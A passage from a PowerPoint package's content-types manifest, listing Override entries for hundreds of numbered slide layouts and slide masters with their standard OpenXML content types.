  <Override PartName="/ppt/slideLayouts/slideLayout885.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout886.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout887.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout888.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout889.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout89.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout890.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout891.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout892.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout893.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout894.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout895.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout896.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout897.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout898.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout899.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout90.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout900.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout901.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout902.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout903.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout904.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout905.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout906.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout907.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout908.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout909.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout91.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout910.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout911.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout912.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout913.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout914.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout915.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout916.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout917.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout918.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout919.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout92.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout920.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout921.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout922.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout923.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout924.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout925.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout926.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout927.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout928.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout929.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout93.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout930.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout931.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout932.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout933.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout934.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout935.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout936.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout937.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout938.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout939.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout94.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout940.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout941.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout942.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout943.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout944.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout945.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout946.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout947.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout948.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout949.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout95.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout950.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout951.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout952.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout953.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout954.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout955.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout956.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout957.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout958.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout959.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout96.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout960.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout961.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout962.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout963.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout964.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout965.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout966.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout967.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout968.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout969.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout97.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout970.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout971.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout972.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout973.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout974.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout975.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout976.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout977.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout978.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout979.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout98.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout980.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout981.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout982.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout983.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout984.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout985.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout986.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout987.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout988.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout989.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout99.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout990.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout991.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout992.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout993.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout994.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout995.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout996.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout997.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout998.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout999.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster114.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster115.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster117.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster118.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster119.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster120.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster121.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster122.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster123.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster124.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster125.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster126.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster127.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster128.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster129.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster130.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster131.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster132.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster133.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster134.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster135.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster136.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster138.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster139.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster140.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster141.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster142.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster143.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster146.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster147.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster153.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster154.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster155.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster156.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster157.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster158.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster159.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster160.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster161.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster162.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster163.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster164.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster165.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster166.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster167.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster168.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster169.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster17.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster170.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster171.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster172.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster173.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster174.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster175.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster176.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster177.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
  <Override PartName="/ppt/slideMasters/slideMaster178.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/>
